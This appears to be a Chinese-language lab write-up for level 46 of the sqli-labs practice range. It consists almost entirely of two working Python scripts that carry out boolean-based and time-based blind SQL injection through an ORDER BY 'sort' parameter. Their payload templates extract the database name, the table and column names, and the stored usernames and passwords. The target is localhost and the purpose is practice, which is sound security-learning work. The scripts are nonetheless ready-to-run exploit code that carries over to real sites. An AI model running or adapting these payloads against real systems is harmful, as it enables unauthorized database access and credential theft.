实践环境基于sqli-lab靶场的第46关进行
bool盲注
代码如下:
import requests
from bs4 import BeautifulSoup
# 定义获取用户名的函数,使用 BeautifulSoup 解析 HTML 页面,提取用户名信息
def get_username(resp):
soup = BeautifulSoup(resp, 'html.parser')
try:
# 选择页面中指定位置的元素获取用户名
username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
return username
except IndexError:
# 若未找到对应元素,返回 None
return None
# 定义布尔盲注的通用函数,可用于获取不同类型的信息(数据库名、表名、列名、数据等)
def boolean_blind_injection(query_template):
result = ''
position = 1
while True:
left = 32
right = 127
while left < right:
mid = (left + right) // 2
# 根据传入的查询模板和当前位置、中间字符值构造注入 URL
url = query_template.format(pos=position, mid=mid)
try:
# 发送 GET 请求获取页面响应
resp = requests.get(url)
# 调用 get_username 函数获取用户名
username = get_username(resp.text)
if username == 'Dumb':
# 若用户名是 'Dumb',说明条件成立,更新左边界
left = mid + 1
else:
# 否则更新右边界
right = mid
except requests.RequestException as e:
# 处理请求异常
print(f"Request error: {e}")
break
if left == 32:
# 若左边界为 32,说明已经获取完所有信息,退出循环
break
result += chr(left)
position += 1
print(result)
return result
if __name__ == '__main__':
# 数据库名注入的查询模板
database_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr(database(),{pos},1))>{mid},id,username) -- "
# 表名注入的查询模板
table_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{pos},1))>{mid},id,username) -- "
# 列名注入的查询模板
column_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{pos},1))>{mid},id,username) -- "
# 数据注入的查询模板
data_query = "http://localhost:8989/Less-46/index.php?sort=if(ascii(substr((select group_concat(username,':',password) from users),{pos},1))>{mid},id,username) -- "
# 调用 boolean_blind_injection 函数进行数据库名注入
boolean_blind_injection(database_query)
# 调用 boolean_blind_injection 函数进行表名注入
# boolean_blind_injection(table_query)
# 调用 boolean_blind_injection 函数进行列名注入
# boolean_blind_injection(column_query)
# 调用 boolean_blind_injection 函数进行数据注入
#boolean_blind_injection(data_query)
时间盲注
代码如下:
import requests
import time
# 配置参数
SLEEP_TIME = 3 # 每次注入的延时秒数
THRESHOLD = 1.5 # 响应时间判断阈值
TIMEOUT = SLEEP_TIME + 2 # 请求超时时间
def time_injection(query_template):
result = ""
pos = 1
session = requests.Session()
while True:
low, high = 32, 126
current_char = None
while low <= high:
mid = (low + high) // 2
payload = query_template.format(
pos=pos,
mid=mid,
sleep=SLEEP_TIME
)
try:
start = time.time()
session.get(payload, timeout=TIMEOUT)
cost = time.time() - start
if cost > THRESHOLD: # 条件成立
low = mid + 1
else:
high = mid - 1
except requests.exceptions.Timeout:
low = mid + 1 # 超时视为条件成立
except Exception as e:
print(f"请求错误: {e}")
break
# 检查有效字符
if high >= 32 and high <= 126:
result += chr(high)
print(f"[*] 当前结果: {result}")
pos += 1
else:
break
return result
if __name__ == '__main__':
# 定义注入模板(注意统一参数顺序)
templates = {
'数据库': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR(database(),{pos},1))>{mid},SLEEP({sleep}),0)",
'表名': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR((SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()),{pos},1))>{mid},SLEEP({sleep}),0)",
'列名': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR((SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='users'),{pos},1))>{mid},SLEEP({sleep}),0)",
'数据': "http://localhost:8989/Less-46/index.php?sort=IF(ASCII(SUBSTR((SELECT GROUP_CONCAT(username,0x7e,password) FROM users),{pos},1))>{mid},SLEEP({sleep}),0)"
}
for name, template in templates.items():
print(f"\n[+] 正在爆破 {name}...")
data = time_injection(template)
print(f"[+] {name} 结果: {data}\n")
